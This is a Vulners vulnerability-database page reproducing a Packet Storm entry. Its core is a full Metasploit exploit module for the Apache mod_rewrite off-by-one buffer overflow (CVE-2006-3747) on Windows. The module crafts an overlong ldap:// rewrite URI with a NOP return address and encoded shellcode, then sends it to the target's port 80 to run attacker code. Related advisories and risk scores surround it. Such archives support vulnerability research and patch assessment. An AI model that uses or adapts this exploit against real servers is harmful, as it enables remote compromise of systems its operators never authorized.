Vulners
Lucene search
apache-mod-rewrite.rb.txt
🗓️ 07 Jan 2008 00:00:00Reported by Marcin KozlowskiType 
packetstorm🔗 packetstormsecurity.com👁 96 Views
| Reporter | Title | Published | Views | Family All 129 |
|---|---|---|---|---|
 | Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC | 21 Aug 200600:00 | – | zdt |
 | Apache < 1.3.37 mod_rewrite LDAP Protocol URL Handling Overflow | 26 Mar 200800:00 | – | nessus |
| Apache < 2.0.59 mod_rewrite LDAP Protocol URL Handling Overflow | 26 Mar 200800:00 | – | nessus |
| Apache < 2.2.3 mod_rewrite LDAP Protocol URL Handling Overflow | 26 Mar 200800:00 | – | nessus |
| Debian DSA-1131-1 : apache - buffer overflow | 14 Oct 200600:00 | – | nessus |
| Debian DSA-1132-1 : apache2 - buffer overflow | 14 Oct 200600:00 | – | nessus |
| Fedora Core 4 : httpd-2.0.54-10.4 (2006-862) | 17 Jan 200700:00 | – | nessus |
| Fedora Core 5 : httpd-2.2.2-1.2 (2006-863) | 17 Jan 200700:00 | – | nessus |
| FreeBSD : apache -- mod_rewrite buffer overflow vulnerability (dc8c08c7-1e7c-11db-88cf-000c6ec775d9) | 29 Jul 200600:00 | – | nessus |
| GLSA-200608-01 : Apache: Off-by-one flaw in mod_rewrite | 4 Aug 200600:00 | – | nessus |
10
`require 'msf/core'
module Msf
class Exploits::Windows::Http::Apache_mod_rewrite < Msf::Exploit::Remote
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache Mod_Rewrite escape_absolute_uri() Off-By-One Buffer Overflow',
'Description' => %q{
This module exploits a off-by-one buffer overflow. RewriteRule must be enabled and rule must meets this criteria:
* beginning of the rewritten URL is controlled.
* flags on the rule do not include the Forbidden (F), Gone (G), or NoEscape (NE) flag
},
'Author' => [ 'Marcin Kozlowski' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 0001 $',
'References' =>
[
['CVE', '2006-3747'],
['BID', '19204'],
['OSVDB', '27588'],
],
'Privileged' => false,
'Payload' =>
{
'BadChars' => "\x00",
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
'DisableNops' => true,
},
'Platform' => 'win',
'Targets' =>
[
['Apache 1.3 branch (>1.3.28 and <1.3.37), Apache 2.0 branch (2.0.46 and <2.0.59), Apache 2.2 branch (>2.2.0 and <2.2.3)', {'Ret' => 0x90909090 }], # our ret is NOP, since our shellcode is shortly after and will be execute next
],
'DisclosureDate' => 'Aug 28 2006'))
register_options(
[
OptString.new('REWRITEPATH', [true, "Rewrite path"]),
Opt::RPORT(80)
], self.class )
end
def exploit
connect
rewritepath = datastore['REWRITEPATH']
uri = "/#{rewritepath}/ldap://"+rand_text_alphanumeric(rand(16))+"/"+rand_text_alphanumeric(rand(32))+"%3f"+rand_text_alphanumeric(rand(8))+"%3f"+rand_text_alphanumeric(rand(8))+"%3f"+rand_text_alphanumeric(rand(16))+"%3f"+rand_text_alphanumeric(rand(8))+"%3f%90"
uri += payload.encoded
res = "GET #{uri} HTTP/1.0\r\n\r\n"
print_status("Trying ...")
sock.put(res)
sock.close
handler
disconnect
end
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 Jan 2008 00:00Current
9.5High risk
Vulners AI Score9.5
EPSS0.90024